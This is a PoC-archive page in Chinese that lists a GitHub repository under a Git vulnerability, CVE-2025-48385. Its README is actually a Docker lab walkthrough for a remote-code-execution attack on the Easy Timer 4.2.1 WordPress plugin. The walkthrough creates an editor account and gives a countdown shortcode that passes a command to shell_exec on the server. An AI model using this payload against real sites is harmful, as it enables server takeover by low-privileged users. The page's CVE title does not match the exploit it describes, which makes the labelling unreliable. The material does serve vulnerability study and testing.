支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 73272bf67c1789f88d7365ccbf74c20873077216

来源
https://github.com/Nimisha17/Git-clone-CVE-2025-48385
关联漏洞
标题:Git 安全漏洞 (CVE-2025-48385)
Description:Git是Git开源的一套免费、开源的分布式版本控制系统。 Git存在安全漏洞,该漏洞源于对所发布的捆绑包验证不充分,允许远程端执行协议注入。
介绍
# Easy Timer v4.2.1 - 

## Prerequisites

* Docker Engine installed
* Docker Compose installed

Refer to the official Docker docs for installation: [Docker Engine Install](https://docs.docker.com/engine/install/)

## 1. Start WordPress with Docker

From your project directory:

```bash
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress
```

## 2. Set Up WordPress

1. Navigate to `http://localhost:8000/`
2. Complete the WordPress Setup
3. Navigate to `WordPress Dashboard` → `Plugins` → `Easy Timer` and click `Activate`.
<img width="740" height="325" alt="Screenshot from 2025-10-27 12-52-06" src="https://github.com/user-attachments/assets/91f6d1b6-83c4-4781-b3fa-d5be4d218c3e" />

## 3. Add new user with Editor Privileges

From your project directory execute the following command:
```bash
docker compose run --rm wpcli user create \
  editoruser editoruser@example.com \
  --role=editor \
  --user_pass=P@ssw0rd!
```
(note: replace with your choice of user name, email and password!)

## 4. Create Post

1. Go to `Posts` → `Add New`
2. Insert a `Shortcode block` and enter:

```text
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
```

3. Click **Update → Preview Post** to see the timer execute.

> ⚠️ Note: Ensure you are using a **Shortcode block**, not a Paragraph block, for the shortcode to render properly.

<img width="681" height="278" alt="Screenshot from 2025-10-27 13-36-40" src="https://github.com/user-attachments/assets/00672fbd-9f1e-4a99-9508-f20f91488252" />

---
Congratz you got RCE.
<img width="944" height="620" alt="image" src="https://github.com/user-attachments/assets/2adc719c-4556-4a15-a216-9542a458c8b1" />




## Debugging Tips

* Check running containers:

```bash
sudo docker ps
```

You should see something like:

<img width="1174" height="121" alt="Screenshot from 2025-10-27 12-51-08" src="https://github.com/user-attachments/assets/41599c77-12b2-482e-b349-a79075e45ae7" />


* If shortcodes are **not rendering**:

  1. Go to **Appearance → Themes**
  2. Activate **Twenty Twenty-Three** (or another default theme).


* If navigating to `http://localhost:8000/` says **Database Not Connected**:
  1. Wait a minute or two for the Database to finish setting up
文件快照

 [4.0K]  /data/pocs/73272bf67c1789f88d7365ccbf74c20873077216
├── [1.1K]  docker-compose.yml
└── [2.3K]  README.md

1 directory, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。